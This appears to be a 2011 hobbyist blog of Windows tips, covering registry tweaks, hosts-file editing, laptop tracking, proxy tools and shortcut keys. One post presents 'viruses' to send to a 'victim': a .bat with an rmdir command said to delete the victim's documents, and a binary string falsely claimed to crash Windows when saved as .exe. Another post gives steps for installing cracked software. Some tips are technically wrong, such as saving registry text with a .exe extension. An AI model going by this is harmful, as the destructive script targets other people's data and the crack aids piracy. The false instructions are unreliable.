Tuesday, December 13, 2011

How to make faster windows XP shutdown process?

Using this tip, you can make the windows XP shutdown process bit faster up to 50 percent than normal time. Normally windows XP takes time to close all running services and applications to complete the shutdown process, but if you have little experience to edit windows registry keys then you can easily manage the windows shutdown process.

Perform the following steps to manage the windows shutdown process:
  • To edit this feature, you will need to be logged into your computer with administrative rights.
  • First click on Start button to open "Run" and type "notepad" then press Ok button to open the Notepad Editor.
Now type the following code in Notepad.
 
 HKEY_CURRENT_USER\ControlPanel\Desktop
"AutoEndTasks"="1"
"HungAppTimeout"="1000"
"WaitToKillAppTimeout"="2000"

 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
"WaitToKillServiceTimeout"="2000" 
Save this file with .exe extension (as registry file, for example shutdown.exe).
Now double click on shutdown.exe file (in this case), and click Yes and again Ok button to update computer registry.

  
NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM. 

JAI HIND...... 

FROM:KRUNAL UPADHYAY

Monday, November 28, 2011

How to hide important data from others users ?

Normally when you need to secure your important data from other users, then your first choice is to burn it on CD or put it to removable drive instead of hard drive. But imagine if your data size is more than 100 GB then it is not easy to burn it on CD. No worry, you can save your full drive from other users access using this trick. Check out InfoSec Institute for IT courses including computer forensics boot camp training

Perform the given steps to hide your system data partition:

  • To enable this feature, you will need to be logged into your computer with administrative rights.


  • First click on Start button to open "Run" and type "CMD" (without the quotes) then press Ok button to open Command Prompt.

Now type diskpart on the blinking cursor and wait for 5 seconds to appear diskpart> utility.

To show the list of volume, type list volume command after the diskpart> prompt, this command will show you all system drives detail.

Now first select the volume that you want to hide, for example,

if you need to hide F drive then first type select volume 2 (in this case) and press enter button.

After loading volume, type remove letter F (in this case) to hide F drive.

Now exit from command prompt and open My Computer to verify drives.

But next time, when you want to unhide the D drive, just run assign drive F command after loading volume 2.


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM AND DESTROYED CYBER CRIMINALS FROM THE OUR GREEN AND PEACE EARTH..........


JAI HIND......

FROM:KRUNAL UPADHYAY

Thursday, June 23, 2011

Master Trick to Make Your Windows XP Boot Faster

This simple trick would make u feel more handy on your System, as this one would make your win XP load much faster..

So here we go..

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.

4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

Adding an Application to the Right Click on Every Folder_Tip

Here is how to add any application to the Context Menu when you right click on any Folder. This way you do not have to always go to the Start Menu. When you right click on any folder, you can have access to that application, the same as using Sent To.


1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell
3. Add a new Key to the "Shell" Key and name it anything you like.
4. Give it a default value that will appear when you right click a folder, i.e. NewKey (use an "&" without the quotes, in front of any character and it will allow you to use the keyboard)
5. Click on the Key HKEY_CLASSES_ROOT\Folder\shell\NewKey
6. Add a New Key named Command
7. Set the (Default) value of the application you want to run
8. For example: c:\program files\internet explorer\iexplore.exe (Include the full path and parameters if you need them)

TIP to ON/OFF Notification Area Ballon Tips

Sometime you are very annoyed of Notification Area Balloon Tips.This tip will help you to off these balloon tips that pop from Notification area which is on the right side of the Taskbar, adjacent to the Clock display.

[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: REG_DWORD [Dword Value] // Value Name: EnableBalloonTips
Setting for Value Data: [0 = Balloon Tips Disabled / 1 = Balloon Tips Enabled]
Exit Registry and Reboot

ADD/Change Restrictions & Features for Windows.....

If you want to make restrictions to what users can do or use on their computer without having to run Poledit, you can edit the Registry. You can add and delete Windows features in this Key shown below.
Zero is Off and the value 1 is On. Example: to Save Windows settings add or modify the value name NoSaveSettings to 0, if set to1 Windows will not save settings. And NoDeletePrinter set to 1 will prevent the user from deleting a printer.


The same key shows up at:
HKEY_USERS\(yourprofilename)\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer so change it there also if you are using different profiles.
1.Open RegEdit
2.Go to
HKEY_CURRENT_USER\Software\Microsoft\ CurrentVersion\ Policies
3.Go to the Explorer Key (Additional keys that can be created under Policies are System, Explorer, Network and WinOldApp )
4.You can then add DWORD or binary values set to 1 in the appropriate keys for ON and 0 for off.
NoDeletePrinter - Disables Deletion of Printers
NoAddPrinter - Disables Addition of Printers
NoRun - Disables Run Command
NoSetFolders - Removes Folders from Settings on Start Menu
NoSetTaskbar - Removes Taskbar from Settings on Start Menu
NoFind - Removes the Find Command
NoDrives - Hides Drives in My Computers
NoNetHood - Hides the Network Neighborhood
NoDesktop - Hides all icons on the Desktop
NoClose - Disables Shutdown
NoSaveSettings - Don't save settings on exit
DisableRegistryTools - Disable Registry Editing Tools
NoRecentDocsMenu - Hides the Documents shortcut at the Start button
NoRecentDocsHistory- Clears history of Documents
NoFileMenu _ Hides the Files Menu in Explorer
NoActiveDesktop - No Active Desktop
NoActiveDesktopChanges- No changes allowed
NoInternetIcon - No Internet Explorer Icon on the Desktop
NoFavoritesMenu - Hides the Favorites menu
NoChangeStartMenu _ Disables changes to the Start Menu
NoFolderOptions _ Hides the Folder Options in the Explorer
ClearRecentDocsOnExit - Empty the recent Docs folder on reboot
NoLogoff - Hides the Log Off .... in the Start Menu
And here are a few more you can play with
ShowInfoTip
NoTrayContextMenu
NoStartMenuSubFolders
NoWindowsUpdate
NoViewContextMenu
EnforceShellExtensionSecurity
LinkResolveIgnoreLinkInfo
NoDriveTypeAutoRun
NoStartBanner
NoSetActiveDesktop
EditLevel
NoNetConnectDisconnect
RestrictRun - Disables all exe programs except those listed in the RestrictRun subkey
This key has many other available keys, there is one to even hide the taskbar, one to hide the control panel and more. I'm not telling you how, as someone may want to play a trick on you. The policies key has a great deal of control over how and what program can run and how one can access what feature.
In the System key you can enter:
NoDispCPL - Disable Display Control Panel
NoDispBackgroundPage - Hide Background Page
NoDispScrSavPage - Hide Screen Saver Page
NoDispAppearancePage - Hide Appearance Page
NoDispSettingsPage - Hide Settings Page
NoSecCPL - Disable Password Control Panel
NoPwdPage - Hide Password Change Page
NoAdminPage - Hide Remote Administration Page
NoProfilePage - Hide User Profiles Page
NoDevMgrPage - Hide Device Manager Page
NoConfigPage - Hide Hardware Profiles Page
NoFileSysPage - Hide File System Button
NoVirtMemPage - Hide Virtual Memory Button
In the Network key you can enter:
NoNetSetup - Disable the Network Control Panel
NoNetSetupIDPage - Hide Identification Page
NoNetSetupSecurityPage - Hide Access Control Page
NoFileSharingControl - Disable File Sharing Controls
NoPrintSharing - Disable Print Sharing Controls
In the WinOldApp key you can enter:
Disabled - Disable MS-DOS Prompt
NoRealMode - Disables Single-Mode MS-DOS

Excel Formulas Tutorials And Video

This review is about Excel Formulas Tutorials and Expert Advice website which provides you Excel learning tutorials (video form) and their experts answers your Excel problems.If you need any help or want to fixed any problem you dont have to google for it just go to Excel Formula site and ask your question.



They kept your information or problem confidential which is important thing and also gives you the optimal solution by their experts.They have just started a free Excel video training center. It contains over an hour of free Excel video tutorials. Anything from the very basic topics such as ‘how to enter a formula’, to advanced topics like the IF and VLOOKUP functions.

Tuesday, June 14, 2011

How to track your Stolen lapton ? Get your stolen laptop back by tracking.......

Using Prey, you’ll have the upper hand over thieves

A laptop is a lot of things—it’s a mobile entertainment center, a portal to the web, and a way to get work done away from home. More than anything, though, it’s a freakin’-expensive piece of hardware that you absolutely do not want to lose.

Of course, the best way to keep your laptop is to not get it stolen in the first place. But if you do, you can be prepared to try and track it down. Plenty of companies are more than happy to charge you a recurring fee for this sort of protection, but you can actually get it for free. A software package called Prey allows you to remotely monitor your stolen laptop, retrieving screenshots, webcam pictures, and Wi-Fi hotspot information that you (and the police) can use to track down your property. It’s open source, it’s free, and we’ll show you how to use it.

1. Make a Guest Account in Windows

In Windows, Prey runs as a service. Unfortunately, that means that its tracking abilities will only kick in when a thief logs into a user account on your computer. A truly sophisticated criminal would know to never do this, but we’re looking to provide protection against your average thug, not Ethan Hunt.

So the thug has to be able to log into an account. You’ve got two options: First, you could remove the password from your primary account (which for safety reasons should never be the administrative account). That leaves your data exposed, so we recommend the second option—creating a password-unprotected guest account.

track stolen laptop

Creating a guest account is easy—just open the Start Menu, then right-click Computer and select Manage. In the Local Users and Groups tab you can right-click and create a new account (above).

2. Install Prey

Now, log in to your new guest account, and download the Prey installer from www.preyproject.com. Run the installer, and when you get to the end, choose to configure Prey now. The first thing you’ll need to decide is how you want to manage Prey (below). You can choose to use the online control panel, or to set it up in stand-alone mode. There are a few drawbacks to the online control panel (you can only store 10 reports at once online, for one), but we think the convenience outweighs any limitations. Select the control panel method and you’ll be asked to create an account.

track stolen laptop

The only other setting you may want to change locally is to tell your computer to automatically connect to in-range Wi-Fi hotspots. This may help Prey send you reports, even if the perp doesn’t mean to connect to the Internet.

3. Get Reports

track stolen laptop

The unthinkable has happened! Your laptop has been pilfered! (Or, you just want to test out Prey). It’s time to log in to the control panel and have a look around. In the control panel at Preyproject.com, there are a number of reporting options you can set, but the most important is at the top, marked Missing. If your laptop is stolen, toggle this option as soon as possible to tell Prey to start sending reports. You can also increase the frequency of sent reports, but remember that the free version of Prey stores only 10 reports at a time, so if you’re not going to be able to retrieve the reports over a few hours, you might want to set a longer interval. Beyond that, all the options are pretty straightforward—they allow you to keep track of networking and geolocation information (above), so you can find your laptop, and to track webcam activity and which programs the thief uses (below), so you can identify them to the police.

track stolen laptop

Who are hacker, cracker? what hacker do? Introduction of Hacker And Cracker

I feel it is necessary to clarify the term hacker. Perhaps yourdefinition of a hacker has been influenced and tainted over the years. There have been various computer related activities attributed to the term “hacker”, but were greatly misunderstood. Unfortunately for the people who are truly defined within the underground tech world as a “hacker” this is an insult to them.




There are various types of “hackers”, each with their ownagenda. My goal is to help protect you from the worst of them.

Anarchist Hackers

These are the individuals who you should be weary of. Their sole intent on system infiltration is to cause damage or use information to create havoc. They are primarily the individualswho are responsible for the majority of system attacks against home users. They are more likely to be interested in what lies onanother person’s machine for example yours.

Mostly you’ll find that these individuals have slightly above computer skill level and consider themselves hackers. They glorify themselves on the accomplishments of others. Their idea of classing themselves as a hacker is that of acquire programsand utilities readily available on the net, use these programs withno real knowledge of how these applications work and if they manage to “break” into someone’s system class themselves as a hacker. These individuals are called “Kiddie Hackers.”

They use these programs given to them in a malicious fashion on anyone they can infect. They have no real purpose to what theyare doing except the fact of saying “Yeah! I broke into computer!” It gives them bragging rights to their friends.

If there is any damage to occur in a system being broken into these individuals will accomplish it.

These individuals are usually high school students. They bragabout their accomplishments to their friends and try to build animage of being hackers.

Hackers

A hacker by definition believes in access to free information.They are usually very intelligent people who could care very little about what you have on your system. Their thrill comes from system infiltration for information reasons. Hackers unlike“crackers and anarchist” know being able to break system security doesn’t make you a hacker any more than adding 2+2 makes you a mathematician. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker.” Theyhave attributed any computer related illegal activities to the term“hacker.”

Real hackers target mainly government institution. They believe important information can be found within government institutions. To them the risk is worth it. The higher the security the better the challenge. The better the challenge the better they need to be. Who’s the best keyboard cowboy? So to speak!

These individuals come in a variety of age classes. They range from High School students to University Grads. They are quite adept at programming and are smart enough to stay out of the spotlight.

They don’t particularly care about bragging about their accomplishments as it exposes them to suspicion. They prefer to work from behind the scenes and preserve their anonymity.

Not all hackers are loners, often you’ll find they have a very tight circle of associates, but still there is a level of anonymity between them. An associate of mine once said to me “if they say they area hacker, then they’re not!”

Crackers

For definition purposes I have included this term. This is primarily the term given to individuals who are skilled at the artof by passing software copyright protection. They are usuallyhighly skilled in programming languages.

They are often confused with Hackers. As you can see they are similar in their agenda. They both fight security of some kind,but they are completely different “animals.”

Being able to attribute your attacks to the right type of attacker isvery important. By identifying your attacker to be either an Anarchist Hacker or a Hacker you get a better idea of what you’reup against.

“Know your enemy and know yourself and you will always bevictorious…”


Microsoft Windows Malicious Software Removal Tool

Microsoft released the Microsoft Windows Malicious Software Removal Tool to help remove specific prevalent malicious software from computers that are running Windows 7, Windows Vista, Windows Server 2003, Windows Server 2008, or Windows XP. After you download the Microsoft Malicious Software Removal Tool, the tool runs one time to check your computer for infection by specific prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps remove any infection it finds. Microsoft releases a new version of the tool every month.

Microsoft Windows Malicious Software Removal Tool features:
• The tool removes malicious software from an already-infected computer. Antivirus products block malicious software from running on a computer. It is significantly more desirable to block malicious software from running on a computer than to remove it after infection.


• The tool removes only specific prevalent malicious software. Specific prevalent malicious software is a small subset of all the malicious software that exists today.


• The tool focuses on the detection and removal of active malicious software. Active malicious software is malicious software that is currently running on the computer. The tool cannot remove malicious software that is not running. However, an antivirus product can perform this task.
The Microsoft Windows Malicious Software Removal Tool is FREE! You only need to run->mrt.exe

Note: You cannot download and run the tool if you are running Microsoft Windows 98, Windows Millennium Edition, or Microsoft Windows NT 4.0. This tool is for Win XP SP2 and above including Vista& Windows 7

For further knowledge click here

I highly recommend this tool.This is the only software that can help you out of deadly password hackers.

Top Ten Best Links To Access Blocked Sites Online

Lots of Countries has Blocked the Number of sites like youtube, Orkut, Myspace and others. There are many tips and tricks related to bypassing Internet firewalls and accessing blocked websites but with time these tricks have become useless and obsolete. There is very good tricks to accessed block sites through proxy settings. Here is the list of Ten Free Tools to bypass firewalls and access blocked websites which are blocked by country ISPs or network firewalls.

1. UltraSurf (Link)

UltraSurf is the flagship software product from UltraReach for Internet anti-censorship. It enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely. It enables users to browse any website freely just the same as using the regular browser while it automatically searches the highest speed proxy servers in the background.

2. GPass (Link)

Hide your IP address during web surfing. Support streaming audio/video, email, instant messaging, download managers, etc. Break through Internet blocking. Easy-to-use graphical user interface.

3. FreeGate (Link)

FreeGate is an anti-censorship client software for a secure and faster internet. Users access web sites overseas as fast as their local ones. It requires no installation or change in system setting. FreeGate works together with DynaWeb, a P2P-like proxy network system.

4. Garden GTunnel (Link)

GTunnel is a Windows application that works as a local HTTP or SOCKS proxy server. After setting proxy to GTunnel in web browser or other Internet applications, the traffic will go through GTunnel and our server farm before it reaches its original destination.

5. JAP (Link)

makes it possible to surf the internet anonymously and unobservably. Instead of connecting directly to a webserver, users take a detour, connecting with encryption through several intermediaries, so-called Mixes. JAP uses a predetermined sequence for the mixes. Such a sequence of linked mixes is called a Mix Cascade. Users can choose between different mix cascades.

6. Your Freedom (Link)

Your Freedom services makes accessible what is unaccessible to you, and it hides your network address from those who don’t need to know. It turns your own PC into an uncensored, anonymous web proxy and an uncensored, anonymous SOCKS proxy that your applications can use, and it can even get you connected to the Internet just as if you were using an unrestricted DSL or cable connection.

7. Hopster (Link)

Hopster is all about open, safe and uncensored internet access. At home, schools, universities and offices worldwide, even in countries where Freedom of Speech is a political challenge. Hide your real IP address and protect yourself from nosy people and wannabe-hackers.

8. Freenet (Link)

Freenet is free software which lets you publish and obtain information on the Internet without fear of censorship. To achieve this freedom, the network is entirely decentralized and publishers and consumers of information are anonymous. Without anonymity there can never be true freedom of speech, and without decentralization the network will be vulnerable to attack.

9. Tor (Link)

Tor is a software project that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.

10. HotSpot Shield (Link)

HotSpot Shield creates a secure virtual private network (VPN) over your connection allowing you to bypass any ISP firewalls and lets you visit even those websites which are blocked by your ISP. It can also be used to visit those websites which are specifically meant for US users e.g. Pandora, Hulu etc.



Tuesday, June 7, 2011

How to Crash Windows XP..........

CRASH DOWN WINDOWS XP


now here is Virus to delete Windows..
its very simple.
Open Notepad
& just copy below code and past it on notepad
01001011000111110010010101010101010000011111100000
save it as ***.exe and send it to victim..
don’t run dis file on your system….. please be careful
NOTE: this is for information purpose only please don’t ever try on your or your friend’s PC.


creating a virus to delete my documents
Open notepad and copy-paste the following code in it.Then save the file with whatever name you like.But be sure to save it as a .bat file.I mean save it like myvirus.bat .It should have the ending as .bat.Now if you give this to some one and if he runs this program then,his my document folder will be deleted.

rmdir C:\Documents and Settings \S\Q.

Download AUTO HIDE IP 5.1.4.6 Free with CRACK......

Download Auto Hide IP 5.1.4.6 free With Crack.......

auto_hideip_hackinghome

Auto Hide IP – Hide Your IP Address, Surf Anonymously, Protect Your Identity, Guard Against Hackers.Be careful! Have you ever been aware of your IP adress?

Your IP exactly points to your location, with very high precision, right to the door of your apartment.
Every time you visit a website, your IP address is completely exposed.Auto Hide IP will help you conceal your real IP and protect your identity online.
You need not worry about your privacy and security any more.
Browse anonymously with one click from now on.

1: Unpack
2: Install software then close
3: Copy crack exe. thats in crack folder into the installation directory replacing the original
l4: start software go into settings disable automatic updates..

Download Link Below:-

Click Here to Download

How to Enable System Tray Notification fo rall Application in UBUNTU 11.04

System tray notifications were just recently enabled in Ubuntu Unity. Unfortunately, the system tray option is not available for many applications and merely works with a few apps such as Mumble, java applications and Wine. In this post we will tell you how to enable system tray for all applications.
Open a Terminal window and enter the below command:
gsettings set com.canonical.Unity.Panel systray-whitelist "['all']"
After that, you can whitelist a certain application if you want, by using the command below. In the given command, make sure you replace “YOUR_APPLICATION”, with the applications name which you wish to add to the whitelist.
gsettings set com.canonical.Unity.Panel systray-whitelist "['JavaEmbeddedFrame', 'Mumble', 'Wine', 'Skype', 'hp-systray', 'YOUR_APPLICATION']"
Log out and login back for the changes to take effect.
Notification Area
Following the method above, you can add a number of applications to the whitelist to make sure that you are not deprived of the system tray notifications of your favorite apps.

How to Edit the HOSTS file in Vista Or Windows 7

How To Edit The HOSTS File In Vista or Windows 7

The HOSTS file is where your computer goes first to translate a domain (404TechSupport.com) to an IP address (96.30.24.98). It’s mostly been replaced by the use of DNS because it would be impossible to keep up with all the new websites created or server changes that occur daily. Despite that, it still has its uses for correcting something locally or filtering sites. Malware might also find its useful to redirect web traffic to a different server. For that reason, Windows has tightened up security on the file and editing the file requires a little trick.

If you were to just go to C:\Windows\System32\drivers\etc and open the hosts file in Notepad, you wouldn’t be able to save your changes.



Instead, you need to go under the Start Menu and either type Notepad or find its listing. Then right-click on Notepad and choose to ‘Run as administrator’. A prompt should come up and you can give it permission.



Once Notepad open go to File, Open (change file type in the dialog box from .txt to all files) and browse to your HOSTS file. You’ll then be able to make and save changes as needed.

TL;DR – Run Notepad as an Administrator (even if you are using an administrator account), open the HOSTS file, and save your changes.

Thursday, May 19, 2011

BLOCKED WEBSITE FROM YOUR PC.......

How to block certain website on your computer?

Some of common reasons to block unwanted websites are, may be you wants to avoid spammers, porn and gambling sources. At home may be you want to prevent your children to access explicit or crude language sites. You can block the unwanted websites in all web browsers without using any third party software. This process only needs to edit the system host file.

Perform the following steps to edit the system host file:

  • To active this feature, you will need to be logged into your computer with administrative rights.

  • First click on Start button and select "Run". Now type "notepad" c:\WINDOWS\system32\drivers\etc\hosts" then press Ok button to open host file.

Now a notepad window will appear with the title "host Notepad".

Now locate the line 127.0.0.1 localhost and here press the Enter key to change the line then type the websites name. For example if you want to block site www.myspace.com then type as:

127.0.0.1 localhost

127.0.0.1 www.myspace.com

  • Here you can add many sites with prefix 127.0.0.1.

  • Now go to File menu and save these setting.

  • When you want to restore access to this site, simply remove this line and again save it.

  • Close the host file and reboot your computer after any changes to go into effect.

INTERNET EXP. SHORTCUT KEY........

Useful Internet Explorer Shortcut keys


Key Purpose

  • F1 Used to open the help of Internet Explorer.

  • F3 Open the search window with in explorer.

  • F4 View the previously opened websites

  • F5 Refresh the webpage.

  • F6 Used to select the address bar.

  • F10 Used to select the main menu bar.

  • F11 View webpage in Full Screen View (on/off).

  • Print Screen Used to capture the full screen.

  • Esc Used to stop any downloading page.

Shortcut keys with the Combination of Ctrl key

Key Purpose

  • Ctrl+A Used to select the full page of active screen.

  • Ctrl+B Used to open "Organize Favorites" windows to organize the list of favorites.

  • Ctrl+F Used to find any word or phrase in a page.

  • Ctrl+H Used to open the history of previously opened websites

  • Ctrl+I Used to open the list of favorites.

  • Ctrl+E Open the search window with in explorer.

  • Ctrl+P Used to send the print of active webpage.

  • Ctrl+O Used to move to new location (type new website name, document or folder to open in internet explorer).

  • Ctrl+W Used to close the active windows.

  • Ctrl+N Used to open the active webpage in new window.

  • Ctrl+F4 Used to close the active windows.

  • Ctrl+R Perform same task like F5 (Refresh the active webpage).

  • Ctrl+Page Up Used to move active page up.

  • Ctrl+Page Down Used to move active page down.

  • Ctrl+Mouse Wheel Used to change the font size of active page.

  • Ctrl+Enter Press Ctrl+Enter Windows will automatically add both "www" and ".com"


Shortcut keys with the Combination of ALT key

Key Purpose

  • ALT+A Used to open the list of your favorite.

  • ALT+D Go to address bar.

  • ALT+H Used to open internet explorer Help menu.

  • ALT+E Used to open internet explorer Edit menu.

  • ALT+F Used to open internet explorer File menu.

  • ALT+T Used to open internet explorer Tools menu.

  • ALT+V Used to open internet explorer View menu.

  • ALT+F4 Close the active internet explorer.

  • ALT+Home Move to your home page.

  • ALT+LEFT Used to move to Back page.

  • ALT+RIGHT Used to move to Forward page.